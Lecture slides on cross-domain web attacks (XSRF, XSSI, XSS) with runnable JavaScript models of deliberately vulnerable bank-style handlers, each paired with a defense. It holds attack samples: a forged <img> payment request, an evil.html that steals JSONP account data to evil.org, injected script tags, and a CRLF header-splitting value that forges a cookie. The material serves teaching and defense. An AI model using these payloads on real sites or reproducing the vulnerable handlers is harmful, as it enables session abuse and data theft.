Cross-Domain Security in Web Applications
Outline
• Cross Domain Interaction
• Attack Methods
– Cross-Site Request Forgery (XSRF)
– Cross-Site Script Inclusion (XSSI)
– Cross-Site Scripting (XSS)
• Prevention
– Preventing XSRF
– Preventing XSSI
– Preventing XSS
Cross Domain Interaction
• The Interaction
– Domain: where our apps & services are hosted
– Cross-domain: security threats that arise from interactions between our applications and pages on other domains
– Ex: Alice is simultaneously (i.e. in the same browser session) using our ("good") web application and a "malicious" web application
• Security issues
– One browser interacts with multiple web apps at once
– The interactions could be benign or malicious
– These are not direct attacks on our servers: the attacker works through the user's browser, which carries the user's credentials (cookies) for our site
Interaction Between Web Pages From Different Domains
• Possible interactions are limited by the same-origin policy (a.k.a. cross-domain security policy)
– Links, embedded frames, and inclusion of images, scripts and other data across domains are still possible
– Client-side scripts can still cause cross-domain requests to be made (e.g. by adding an <img> or <script> element), even though the same-origin policy stops them from reading the response directly
Cross-Site Request Forgery (XSRF): Example
Message sequence between Alice's browser, bank.com and the attacker's site (reconstructed from the slide's diagram):
1. Alice logs in: /auth uname=victim&pass=fmd9032; bank.com sets Cookie: sessionid=40a4c04de
2. Alice uses the site normally: /viewbalance with Cookie: sessionid=40a4c04de
3. While still logged in, Alice visits the attacker's site, whose /evil.html contains:
<img src="http://bank.com/paybill?addr=123 evil st & amt=$10000">
4. To load the "image", the browser sends /paybill?addr=123 evil st, amt=$10000 to bank.com with Cookie: sessionid=40a4c04de attached, exactly as it would for a request Alice made herself
5. bank.com replies "OK. Payment Sent!": the request was composed by the attacker's page but authenticated with Alice's session
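A runnable model of why the forged <img> request above is accepted, added here as an example and not code from the original slides. It simulates the hypothetical bank.com /paybill handler in Node.js; the session store, the token table, the amounts and the `xsrf_token` parameter name are all constructed for the example, and the hardened variant uses the synchronizer-token defense, which this section of the slides does not cover.

```javascript
// Added example (not from the original slides): the forged <img> request above,
// handled first by a cookie-only handler and then by one that also checks a
// per-session anti-XSRF token. All data below is constructed.

function freshSessions() {
  return { "40a4c04de": { user: "victim", balance: 50000 } };
}

// Vulnerable handler: authorizes the transfer on the session cookie alone, so it
// cannot tell whether the user or a page on another domain composed the URL.
function paybillVulnerable(req, sessions) {
  const session = sessions[req.cookies.sessionid];
  if (!session) return { status: 401, body: "Not logged in" };
  session.balance -= Number(req.params.amt);
  return { status: 200, body: "OK. Payment Sent!" };
}

// Browser behaviour the slides assume: loading <img src="http://bank.com/...">
// from evil.html issues a GET to bank.com and attaches bank.com's cookies to it.
function requestFromImgTag(src, cookiesForThatHost) {
  const url = new URL(src);
  return {
    method: "GET",
    path: url.pathname,
    params: Object.fromEntries(url.searchParams),
    cookies: cookiesForThatHost,
  };
}

// The forged request as evil.html would cause it (query string from the slide, URL-encoded).
function runForgery(handler) {
  const sessions = freshSessions();
  const forged = requestFromImgTag(
    "http://bank.com/paybill?addr=123%20evil%20st&amt=10000",
    { sessionid: "40a4c04de" });
  const reply = handler(forged, sessions);
  return { status: reply.status, body: reply.body, balance: sessions["40a4c04de"].balance };
}

// Hardened handler (synchronizer-token pattern, not from this page): also require a
// per-session secret that only pages served by bank.com can read and embed in the
// form. evil.html cannot read it, so any URL it composes lacks the token.
const XSRF_TOKENS = { "40a4c04de": "c1b2f0e9d8" };   // constructed sample token

function paybillHardened(req, sessions) {
  const session = sessions[req.cookies.sessionid];
  if (!session) return { status: 401, body: "Not logged in" };
  if (req.method !== "POST" || req.params.xsrf_token !== XSRF_TOKENS[req.cookies.sessionid])
    return { status: 403, body: "Rejected: not a POST or bad anti-XSRF token" };
  session.balance -= Number(req.params.amt);
  return { status: 200, body: "OK. Payment Sent!" };
}

// Legitimate submission from a bank.com page whose form embeds the token.
function runLegitimate(handler) {
  const sessions = freshSessions();
  const req = {
    method: "POST", path: "/paybill",
    params: { addr: "123 main st", amt: "100", xsrf_token: "c1b2f0e9d8" },
    cookies: { sessionid: "40a4c04de" },
  };
  const reply = handler(req, sessions);
  return { status: reply.status, body: reply.body, balance: sessions["40a4c04de"].balance };
}
```

Current browsers default cookies to SameSite=Lax, which withholds the session cookie on a cross-site <img> GET like the one on the slide, but cookies explicitly marked SameSite=None and state-changing GET endpoints keep the pattern relevant, and the server-side token check is what makes the handler safe regardless of client behaviour.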
Cross-Site Script Inclusion (XSSI)
• A 3rd-party page can include a <script> whose src points at us
• Static Script Inclusion
– Purpose is to enable code sharing, i.e. providing a JavaScript library for others to use
– Including a 3rd-party script is dangerous without control over it, since it runs in our context with full access to client data
• Dynamic Script
– Instead of the traditional postback of a new HTML document, asynchronous requests (AJAX) are used to fetch data
– The data is exchanged between the user's browser and our server as XML or JSON (arrays, dicts); a malicious site can make the user's browser perform this same exchange with our server
XSSI Procedure
• A malicious website can request our dynamic script with a <script> tag
• The browser sends our authentication cookies with that request
• The script (JSON fragment) returned by the server is accessible to and runs on the malicious site
• But the script is evaluated in the hacker's context, not ours
• The hacker redefines the callback method to process and harvest the user data as desired
XSSI Example
• Request: http://www.mywwwservice.com/json/nav_data?callback=UpdateHeader
• Typical interaction: the server replies with a JavaScript code snippet that sends back user data:
UpdateHeader({
  "date_time": "2007/07/19 6:22",
  "logged_in_user": "alice",
  "account_balance": "256.98"
})
• Attack scenario: a malicious site loads the script to initiate the request instead of our page. The browser sends our cookies, the server replies as usual, and the evil script gets the user data:
<script>
function UpdateHeader(dict) {
  if (dict['account_balance'] > 100) {
    do_phishing_redirect(dict['logged_in_user']);
  }
} // do evil stuff, get user data
</script>
<script src="http://www.mywwwservice.com/json/nav_data?callback=UpdateHeader">
</script>
XSSI Example: AJAX Script
• Dynamic Script Inclusion: viewbalance.html
• Good Site: www.bank.com
<script>
var x = new XMLHttpRequest(); // used to make an AJAX request
x.onreadystatechange = ProcessResults;
x.open("POST",
  "http://www.bank.com/json/get_data?callback=RenderData");
x.send();
function ProcessResults() {
  if (x.readyState == 4 && x.status == 200)
    eval(x.responseText); // reply is "RenderData({...})": evaluating it calls this page's RenderData
}
</script>
Normal AJAX Interaction
Message sequence between Alice's browser and bank.com (reconstructed from the slide's diagram):
1. Alice logs in and authenticates; bank.com sets Cookie: sessionid=40a4c04de
2. Browser requests /viewbalance.html with Cookie: sessionid=40a4c04de
3. The page's script requests /json/get_data?callback=RenderData (cookie attached)
4. bank.com replies RenderData({"acct_no":"494783", "balance":"10000"})
5. The page evaluates the reply, which calls the page's own RenderData
Another XSSI Attack
Message sequence between Alice's browser, bank.com and evil.org (reconstructed from the slide's diagram):
1. Alice logs in and authenticates to bank.com; Cookie: sessionid=40a4c04de
2. Alice views /viewbalance.html with Cookie: sessionid=40a4c04de
3. Alice also visits evil.org, which serves /evil.html:
<script>
function RenderData(args) { sendArgsToEvilOrg(args); }
</script>
<script src="http://www.bank.com/json/get_data?callback=RenderData">
</script>
4. The browser fetches /json/get_data?callback=RenderData from bank.com, sending Alice's cookie
5. bank.com replies RenderData({"acct_no":"494783", "balance":"10000"})
6. The reply runs in evil.html's context, where the attacker's RenderData overrides the callback, so the account data is sent to evil.org
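A runnable model of the callback-override attack in the two XSSI examples above (the UpdateHeader and RenderData scenarios), added here as an example and not code from the original slides. It simulates the bank.com dynamic-script endpoint and the way a <script src=...> include evaluates the reply in the including page's scope, then shows the standard JSON-prefix defense, which this section of the slides does not cover. The session store, the endpoint shape and the `)]}'` prefix are constructed for the example.

```javascript
// Added example (not from the original slides): XSSI via a caller-chosen JSONP
// callback, and the prefix defense. All data below is constructed.

// Constructed session store for the hypothetical bank.com.
const SESSIONS = { "40a4c04de": { acct_no: "494783", balance: "10000" } };

// Vulnerable dynamic-script endpoint: wraps the logged-in user's data in whatever
// callback name the query string asks for (JSONP style).
function getDataEndpoint(query, cookies) {
  const session = SESSIONS[cookies.sessionid];
  if (!session) return "";                       // unauthenticated: nothing to leak
  return `${query.callback}(${JSON.stringify(session)})`;
}

// Browser behaviour: <script src=...> runs the reply as a script in the *including*
// page's global scope. Modelled by compiling the reply as a function body whose
// only free name is the callback, bound to the including page's definition of it.
function includeScript(responseText, callbackName, callbackFn) {
  return new Function(callbackName, responseText)(callbackFn);
}

// Normal interaction: viewbalance.html on bank.com supplies the real RenderData.
function normalInteraction() {
  const rendered = [];
  const RenderData = (d) => rendered.push(`Account ${d.acct_no}: ${d.balance}`);
  const reply = getDataEndpoint({ callback: "RenderData" }, { sessionid: "40a4c04de" });
  includeScript(reply, "RenderData", RenderData);
  return rendered;
}

// Attack: evil.html defines its own RenderData, then includes the same URL. The
// browser attaches Alice's bank.com cookie, so the reply carries her data, and the
// reply is evaluated in evil.html's context, where the attacker's override wins.
function xssiAttack() {
  const stolen = [];
  const RenderData = (args) => stolen.push(args);  // stands in for sendArgsToEvilOrg
  const reply = getDataEndpoint({ callback: "RenderData" }, { sessionid: "40a4c04de" });
  includeScript(reply, "RenderData", RenderData);
  return stolen;
}

// Defense (not on this page): return plain JSON behind a prefix that is a syntax
// error when executed as a script. Same-origin XHR code strips the prefix before
// parsing; a cross-site <script> include can only fail to parse and leaks nothing.
const XSSI_PREFIX = ")]}'\n";

function hardenedEndpoint(cookies) {
  const session = SESSIONS[cookies.sessionid];
  if (!session) return "";
  return XSSI_PREFIX + JSON.stringify(session);   // no caller-chosen callback
}

// What a <script> include of the hardened reply does: the parse fails before anything runs.
function scriptInclusionFails(responseText) {
  try { new Function(responseText); return false; }
  catch (e) { return e instanceof SyntaxError; }
}

// What the legitimate same-origin XHR consumer does instead of eval().
function sameOriginConsume(responseText) {
  if (!responseText.startsWith(XSSI_PREFIX)) throw new Error("unexpected response shape");
  return JSON.parse(responseText.slice(XSSI_PREFIX.length));
}
```

The prefix works because the reply is only ever meant to be read by same-origin code that can fetch it with XMLHttpRequest and strip the prefix; a cross-site page can include it as a script but never read it as text, so a reply that is not valid JavaScript gives it nothing.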
Cross-Site Scripting (XSS)
• What if an attacker can get a malicious script executed in our application's context?
– The script can access the user's cookies and transfer them to the attacker's server
• Ex: our app takes a query parameter in a search URL and prints it out on the page
– http://www.mywwwservice.com/query?question=cookies
– The following fragment of the returned HTML document has the value of the parameter question inserted into the page:
...<p>Your query for 'cookies' returned the following results:<p>...
– If question is not escaped, a value such as <script>evil()</script> is inserted verbatim and runs in our page
• Ex: a redirect page built from a template whose redir_url value comes from the request:
<html>
<head><title>Moved</title></head>
<body>Moved <a href='%(redir_url)s'>here</a></body>
</html>
– If the same value is also copied into a response header (the redirect target), a redir_url containing line breaks, a Set-Cookie line and a script tag splits the response, and the browser receives:
<script>evil()</script><html><head><title>Moved</title>
</head><body>
Moved <a href='oops:foo
Set-Cookie: SESSION=13af..3b; domain=mywwwservice.com
<script>evil()</script>'>here</a></body></html>
– The injected header sets a cookie of the attacker's choosing and the injected script runs before the intended document
– Or through a tag:
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
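The two injection points above (the echoed search parameter and the redir_url template) as runnable Node.js code, each beside a version that escapes or validates the input; added here as an example and not code from the original slides. The response builders, the parseResponse helper and the attacker value EVIL_REDIR are constructed for the example, modelled on the slide's output.

```javascript
// Added example (not from the original slides): the search-echo and redirect
// template XSS cases, vulnerable and hardened. Inputs are constructed.

// Escape for HTML text and quoted-attribute contexts (not for JS or URL contexts).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));
}

// Search page: the question parameter is echoed into the HTML body.
function searchPageVulnerable(question) {
  return `<p>Your query for '${question}' returned the following results:<p>`;
}
function searchPageHardened(question) {
  return `<p>Your query for '${escapeHtml(question)}' returned the following results:<p>`;
}

// Redirect page: redir_url goes into the Location header and the body template
// from the slide. Raw-string form of the HTTP response, CRLF line endings.
function redirectResponseVulnerable(redirUrl) {
  return "HTTP/1.1 302 Moved\r\nLocation: " + redirUrl + "\r\n\r\n" +
    "<html><head><title>Moved</title></head>" +
    "<body>Moved <a href='" + redirUrl + "'>here</a></body></html>";
}

function redirectResponseHardened(redirUrl) {
  // Header injection needs a line break, so reject CR/LF outright; requiring an
  // absolute http(s) URL also keeps javascript: and similar schemes out of the href.
  if (/[\r\n]/.test(redirUrl) || !/^https?:\/\//i.test(redirUrl))
    throw new Error("invalid redirect target");
  return "HTTP/1.1 302 Moved\r\nLocation: " + redirUrl + "\r\n\r\n" +
    "<html><head><title>Moved</title></head>" +
    "<body>Moved <a href='" + escapeHtml(redirUrl) + "'>here</a></body></html>";
}

// Split a raw response into header lines and body the way a client does:
// the first blank line ends the headers.
function parseResponse(raw) {
  const i = raw.indexOf("\r\n\r\n");
  return { headers: raw.slice(0, i).split("\r\n"), body: raw.slice(i + 4) };
}

// Constructed attacker value for the redirect example on the slide: a bogus
// target, a forged Set-Cookie header, a blank line, then a script tag.
const EVIL_REDIR =
  "oops:foo\r\nSet-Cookie: SESSION=13af..3b; domain=mywwwservice.com\r\n\r\n<script>evil()</script>";

// Convenience: does the response as parsed by a client carry a forged Set-Cookie?
function forgedCookieHeader(raw) {
  return parseResponse(raw).headers.some((h) => h.startsWith("Set-Cookie:"));
}
```

With EVIL_REDIR, the vulnerable builder yields exactly the shape shown on the slide: the client sees a Set-Cookie header it never should have, and the body starts with the injected script before the intended HTML. Escaping alone would not fix the header path, which is why the hardened version validates the value rather than encoding it.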